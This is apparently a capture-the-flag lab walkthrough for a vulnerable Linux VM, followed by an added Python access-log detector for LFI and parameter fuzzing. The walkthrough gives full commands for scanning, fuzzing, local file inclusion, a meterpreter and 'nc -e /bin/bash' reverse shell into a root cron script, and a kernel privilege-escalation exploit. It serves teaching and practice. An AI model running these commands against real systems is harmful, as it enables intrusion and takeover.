1. Ping sweep of the C-class (/24) range
    nmap -sP 192.168.178.1/24    -> obtains the target IP

2. Port scan
    nmap -p 1-65535 -A 192.168.178.133    -> ports 80 and 22 are open
    Supplement: other ways to do host/port discovery: netdiscover -p, arp-scan ?

3. Directory scan
    dirb http://192.168.178.133    -> finds index.php and image.php
    dirb http://192.168.178.133 -X .php,.txt,.zip    -> finds the file secrt.txt
    curl http://192.168.178.133/secrt.txt    -> a hint to find the parameter by fuzzing, and a hint about the file location.txt
    Further study: another directory scanning method: nikto -host 192.168.178.133

4. FUZZ to find the parameter name
    wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.178.133/index.php?FUZZ
    wfuzz -C -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.178.133/index.php?FUZZ    -> the fuzzed parameter is "file"
    curl http://192.168.178.133/index.php?file=location.txt    -> reveals the real parameter, secrettier360
    Supplement: another use of fuzzing, password brute-forcing (user-dict and pass-dict are the wordlists):
    wfuzz -z file,user-dict -z file,pass-dict --hw 87 "http://192.168.142.139/manage.php?username=FUZZ&password=FUZ2Z"

5. LFI (local file inclusion) vulnerability
    curl http://192.168.178.133/image.php?secrettier360=/etc/passwd    -> saket:x:1001:1001:find password.txt file in my directory:/home/saket:
    curl http://192.168.178.133/image.php?secrettier360=/home/saket/password.txt    -> follow_the_ippsec

6. Log into WordPress as vitor with follow_the_ippsec
    cmseek -u http://192.168.178.133/wordpress/    -> or use the WordPress Theme Editor
    wpscan --url http://192.168.178.133/wordpress --enumerate u

7. Generate a payload with MSF, get a reverse shell and escalate privileges
    1. msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.178.131 lport=7777 -o shell.php    -> generates shell.php
       cat shell.php    paste the contents into the web page and upload
    2. On the attacking machine, enter msfconsole
       msf6 > use exploit/multi/handler     // enter the listener module
       set payload php/meterpreter/reverse_tcp
       set lhost 192.168.178.131
       set lport 7777
       exploit    start listening
       Trigger: http://192.168.178.133/wordpress/wp-content/themes/twentynineteen/secret.php
       This drops into meterpreter >
    Supplement: comparison with generating a Java payload
    msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.178.131 lport=7777 -o shell.php
    msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war
    Supplement 2: using nc to listen. Use the tee command to write a malicious script into tidyup.sh (a file executed by a scheduled task):
    1. echo "nc -e /bin/bash 192.168.110.128  5555" > shell.php
    2. cat shell.php | sudo /usr/bin/tee  /usr/share/cleanup/tidyup.sh     // sudo lets the ordinary user run tee with root privileges
    On the attacking machine, start listening:    nc -lvvp 5555

8. Search for vulnerabilities in the target's operating system
    msf6 > searchsploit 16.04 Ubuntu    -> linux/local/45010.c
    cd /usr/share/exploitdb/exploits/linux/local/
    cp 45010.c /root
    cd /root
    gcc 45010.c -o 45010
    meterpreter > upload /root/45010 /tmp/45010     // upload the exploit to the directory
    meterpreter > shell
    python -c 'import pty;pty.spawn("/bin/bash")'    // spawn an interactive shell
    cd /tmp
    chmod +x 45010
    ./45010
    whoami
    root
    cd /root
    cat root.txt
    b2b17036da1de94cfb024540a8e7075a
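From the defender's side, the parameter fuzzing and LFI requests in steps 4 and 5 above leave a clear trace in the web server's access log. The following is an added example, not part of the original post, that flags both patterns over a few constructed log lines; the client addresses, timestamps and the fuzz threshold are assumptions for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed combined-format access log lines modelled on the walkthrough.
# Addresses and timestamps are assumptions, not captured traffic.
SAMPLE_LOG = """\
192.168.178.131 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?file=location.txt HTTP/1.1" 200 136
192.168.178.131 - - [01/Jan/2024:10:00:02 +0000] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2140
192.168.178.131 - - [01/Jan/2024:10:00:03 +0000] "GET /image.php?secrettier360=..%2F..%2F..%2Fhome/saket/password.txt HTTP/1.1" 200 19
192.168.178.131 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1 HTTP/1.1" 200 136
192.168.178.131 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=1 HTTP/1.1" 200 136
192.168.178.131 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?dir=1 HTTP/1.1" 200 136
192.168.178.131 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?path=1 HTTP/1.1" 200 136
192.168.178.131 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?name=1 HTTP/1.1" 200 136
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /image.php?secrettier360=image.jpg HTTP/1.1" 200 53311
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# A parameter value that reaches outside the web root: directory traversal or an
# absolute path into a sensitive location. Decoded twice so double URL-encoding
# (%252e%252e%252f) does not slip past the check.
LFI_VALUE_RE = re.compile(r'(\.\./|^/(etc|home|root|proc|var/log)/)')
FUZZ_THRESHOLD = 5  # distinct parameter names against one path from one client (assumed)

def detect_lfi(log_text):
    """Return (lfi_hits, fuzz_hits) for the given access-log text.

    lfi_hits:  (client, path, param, decoded_value, status) per suspicious value
    fuzz_hits: (client, path, distinct_param_count) where a client tried many
               different parameter names against the same script
    """
    lfi_hits = []
    params_seen = defaultdict(set)  # (client, path) -> parameter names tried
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable request line
        client, target, status = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            params_seen[(client, parts.path)].add(name)
            decoded = unquote(unquote(value))
            if LFI_VALUE_RE.search(decoded):
                lfi_hits.append((client, parts.path, name, decoded, status))
    fuzz_hits = [(c, p, len(names)) for (c, p), names in params_seen.items()
                 if len(names) >= FUZZ_THRESHOLD]
    return lfi_hits, fuzz_hits
```

On the sample above the detector reports the two file-read values against image.php and one client that tried six different parameter names against index.php; a 200 status on the LFI hits is the signal that the inclusion actually succeeded.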